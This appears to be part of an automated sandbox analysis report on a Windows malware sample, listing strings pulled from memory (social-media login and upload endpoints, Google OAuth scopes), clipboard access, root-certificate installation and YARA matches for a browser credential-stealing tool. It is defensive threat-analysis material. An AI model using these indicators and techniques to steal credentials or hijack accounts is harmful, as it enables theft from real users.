Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000002.00000003.329852304.0000000002ABC000.00000004.00000040.sdmp, 56BB1610C0318054.exe, 00000004.00000003.259393537.0000000002F48000.00000004.00000001.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp, ecvD64F.tmp.8.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.google.com/cloudprint/enab
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN
Source: Web Data1611971454381.2.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com;
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/calend
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/calendar.readonlyAPL
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/clouddevicesaP
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/h
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/hangoutsrx=n
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 56BB1610C0318054.exe String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwriteu
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258939900.0000000002F4E000.00000004.00000001.sdmp String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://www.gstatic.com;
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accept:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.com/origin:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040AE4D OpenClipboard, 8_2_0040AE4D

E-Banking Fraud:

Registers a new ROOT certificate
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext, 0_2_1001F720

System Summary:

Malicious sample detected (through community Yara rule)
Source: 2.2.56BB1610C0318054.exe.32a0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.56BB1610C0318054.exe.30f0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: Cyfj6XGbkd.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 56BB1610C0318054.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread, 0_2_10019D40
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 0_2_10019F00
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 0_2_10019F50
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess, 0_2_10019FA0
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040C516 NtQuerySystemInformation, 8_2_0040C516
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 8_2_0040C6FB
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403660: DeviceIoControl, 0_2_00403660
Detected potential crypto function
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403E2C 0_2_00403E2C
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00404050 0_2_00404050
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_004093D5 0_2_004093D5
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_00403FA9 0_2_00403FA9
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000C063 0_2_1000C063
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000B883 0_2_1000B883
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100060F0 0_2_100060F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100169BD 0_2_100169BD
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100099E0 0_2_100099E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100071F0 0_2_100071F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10009257 0_2_10009257
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10010AED 0_2_10010AED
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10008340 0_2_10008340
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000E380 0_2_1000E380
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000ABA0 0_2_1000ABA0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000B3B0 0_2_1000B3B0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001EBD0 0_2_1001EBD0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_100083F0 0_2_100083F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000BC57 0_2_1000BC57
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000C483 0_2_1000C483
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_10010590 0_2_10010590
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1001EDDB 0_2_1001EDDB
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: 0_2_1000FF71 0_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000C063 2_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000B883 2_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100060F0 2_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100169BD 2_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100099E0 2_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100071F0 2_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10009257 2_2_10009257
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10010AED 2_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10008340 2_2_10008340
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000E380 2_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000ABA0 2_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000B3B0 2_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1001EBD0 2_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_100083F0 2_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000BC57 2_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000C483 2_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_10010590 2_2_10010590
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1001EDDB 2_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: 2_2_1000FF71 2_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_00404BE4 8_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4A0C3 28_2_00F4A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4963B 28_2_00F4963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F46A1E 28_2_00F46A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4A7BB 28_2_00F4A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F49B7F 28_2_00F49B7F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F4B51C 28_2_00F4B51C
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 6D2DB66A98EC5730BDCBC41DC7C78210FE24FE48BF7E44B59AB01C2084900456
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe Code function: String function: 10010534 appears 35 times
PE file contains strange resources
Source: 1611971443428.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611971443428.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Cyfj6XGbkd.exe, 00000000.00000000.221272611.0000000000412000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.243942106.00000000022D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dllj% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.243947116.00000000022E0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.243964941.00000000022F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe Binary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Uses 32bit PE files
Source: Cyfj6XGbkd.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000000.00000002.244341295.0000000002880000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.333865446.00000000026F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.261783876.0000000002620000.00000040.00000001.sdmp, type: MEMORY Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.26f0000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.2880000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.10000000.6.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.26f0000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2620000.5.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2620000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.2880000.5.raw.unpack, type: UNPACKEDPE Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.32a0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.56BB1610C0318054.exe.30f0000.6.unpack, type: UNPACKEDPE Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engine Classification label: mal93.bank.troj.spyw.evad.winEXE@34/38@4/3
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,FindCloseChangeNotification, 8_2_0040CE93
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 28_2_00F41058 CoCreateInstance, 28_2_00F41058
Source: C:\Users\user\AppData\Roaming\1611971443428.exe Code function: 8_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource, 8_2_0040D9FC
